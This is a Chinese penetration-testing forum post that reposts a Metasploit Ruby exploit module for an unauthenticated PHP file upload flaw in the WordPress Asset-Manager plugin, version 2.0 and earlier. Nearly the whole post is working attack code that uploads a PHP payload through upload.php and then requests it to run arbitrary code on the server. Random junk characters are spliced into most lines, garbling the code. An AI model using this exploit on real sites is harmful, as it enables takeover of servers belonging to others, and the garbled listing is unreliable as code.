找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2891|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。6 G# o7 k4 k7 `0 d! O

% [. M9 u- X, r& i- x) D##/ W& M3 o# ^6 @& f' f, o& f
# This file is part of the Metasploit Framework and may be subject to
0 G7 U  z- Q' w# redistribution and commercial restrictions. Please see the Metasploit# y& D7 t) }. S- Q4 O
# Framework web site for more information on licensing and terms of use.
3 `1 I( y  i& |: F% L0 s5 r2 Y#   http://metasploit.com/framework/8 ?. K3 {4 K/ i1 g; d
##
: Q0 a  O% R8 u+ S5 s9 l : h& G: T1 ]( |7 l( k1 H+ @
require 'msf/core'
- i2 G, T; {3 _, grequire 'msf/core/exploit/php_exe'
1 x8 @; J4 @& R
8 f+ k' v8 ^* F+ s2 ~! oclass Metasploit3 < Msf::Exploit::Remote& q" E& @7 a# u/ U7 Z+ B7 M. N
  Rank = ExcellentRanking9 X8 t7 w5 i: T2 U7 M

+ |. {; n+ P# L9 T) X5 X1 z  include Msf::Exploit::Remote::HttpClient
5 p3 _+ r; L$ S! [) [" h# Y  include Msf::Exploit:hpEXE
* o  `5 `, p' ], F: p* |8 ^% w
. V; o6 o" c) x* k, |  def initialize(info = {})
# Q' Z, L+ l6 {4 s9 E4 o    super(update_info(info,
$ ^, Q5 l" C7 E  c      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',6 o  o: E( x$ Z4 W2 K
      'Description'    => %q{0 I) m  ]2 V6 O0 M- m
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress, x! z8 W3 }8 E- L* e4 a
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
- I) W4 I6 W6 C9 Y        temp directory without authentication, which results in arbitrary code execution.
! V1 D3 {, z7 g& W  }/ D- t: `1 e      },
' s" @/ p( a2 R+ G      'Author'         =>6 P" K# @6 K6 c
        [
6 D% B8 {0 p# |+ V# w: K          'Sammy FORGIT', # initial discovery
, n3 e0 F. @4 G5 c; u          'James Fitts <fitts.james[at]gmail.com>' # metasploit module# B" P+ x9 O7 v6 X+ E
        ],7 P8 ?" W5 p0 V: w. g
      'License'        => MSF_LICENSE,3 e) T# Z+ o: ]0 A. ^/ |
      'References'     =>
3 @- R# Q: v8 Z  D- E: w0 w        [
( q1 m  {0 H+ w& l3 o7 Z8 h          [ 'OSVDB', '82653' ],( g! V% L4 b. Q/ [- Q* W1 X
          [ 'BID', '53809' ],
% q, p1 S% Z: k. v3 U          [ 'EDB', '18993' ],
- _) ]) Z" `' }2 m          [ 'URL', 'http:// www.myhack58.com /' ]
( M6 }5 F; s& f. b        ],9 R: S& g! A+ _/ D2 c
      'Payload'       =>
3 F7 `) i: s% w8 P        {: o7 I* k* ~% n# z* G& H
          'BadChars' => "\x00",+ S+ T, j4 i. ?% Z
        },
4 L2 M% O/ Z7 ~! U      'Platform'       => 'php',
+ ?3 w7 X7 k5 ?; B- f  I1 w. j, X      'Arch'           => ARCH_PHP,* J4 x3 k  K4 ?/ K3 h. ^
      'Targets'        =>+ C4 l% \1 S. {0 H  e
        [
  c, t& q- W. z* G, ^) R* d          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
$ a& i) F3 Z( r  y. L2 [, l4 i          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
! z- `4 K- r" n" T9 x4 v# n        ],
" S1 u3 J; R0 K- J2 j      'DefaultTarget' => 0,9 q  v7 _1 a1 ^7 q5 J/ D
      'DisclosureDate' => 'May 26 2012'))  L: \# r- U! C  Q5 Q- l+ a
" c. \4 k% X6 J- q1 r/ y
    register_options(% ?% Y& M  y% ~  f; J
      [
# c9 G5 D) ~) A; J  z$ w        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" w5 a: {2 a* d- i# B      ], self.class)) I3 q, r, ?1 Z. `5 K! L6 m9 ]
  end
) d1 h- O: f; w; N' `! T9 f ; q2 ~: O6 N% h. f& Q0 ]& h
  def exploit  D' C. L& y1 ]& }" \
    uri =  target_uri.path
' @# T% g( T* J  b    uri << '/' if uri[-1,1] != '/') x6 L6 A9 x2 i5 a! X" R7 l
    peer = "#{rhost}:#{rport}"1 S- T5 }) N; _/ x% s' k
    payload_name = "#{rand_text_alpha(5)}.php"
7 \# t' q3 D8 w% K$ D1 f) j- m    php_payload = get_write_exec_payload(:unlink_self=>true); J8 \, Y1 u& s9 ]" v% p7 h! j
8 k; J2 X( o( Z$ {
    data = Rex::MIME::Message.new) \5 t2 m& i  Q* z2 o: \
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
0 ]' n. r* e2 _. b5 g8 O    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
% n, L& @6 ]) N, D
5 A/ w5 A4 w/ H0 U, p3 K2 H7 [    print_status("#{peer} - Uploading payload #{payload_name}")
' P$ Q* ]$ _* r1 t. y  K    res = send_request_cgi({& S. N3 |' c# p8 n5 @
      'method'  => 'POST',
% {5 _4 g7 G/ ], A7 G; z/ o      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
# V. S, H5 H$ m$ S      'ctype'   => "multipart/form-data; boundary=#{data.bound}",! x; B& K8 c1 }+ e# d, B" h( W
      'data'    => post_data1 m2 g& h; n4 z1 d7 U9 y1 k
    })
) J& N& L! J4 T5 D! M
1 D' ~! ]5 J) N    if not res or res.code != 200 or res.body !~ /#{payload_name}/, @2 T  h9 X( q6 j2 c( p
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, a. K, m5 X, J' z2 Nend
. U4 Z/ K& y6 o: f/ l
% `$ Y6 X0 B2 @: S# t    print_status("#{peer} - Executing payload #{payload_name}")
9 L: |7 p1 K" o    res = send_request_raw({, P# o& d- m3 s4 ~* p1 e( k# W1 L
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",* N9 G1 Q; b1 o% J+ z* l2 [5 j( C9 W* O9 r
      'method'  => 'GET'
; |0 G8 Z" z0 S" D/ X: ]  l2 P- |    }), e2 q2 b5 {# X3 r1 v6 Y

+ J% D( P3 O3 ?! B5 {  r    if res and res.code != 200
, l5 ]& g1 }. s' m1 h      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
) ~2 d7 h+ e; }" t" q  {' p. _    end
: g' n$ a; w6 K- _; l$ h5 g  end( Q) [1 d; E: P* Y- f0 A
end! x1 j4 n& O/ y, ^" _6 Y: }+ h8 h
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表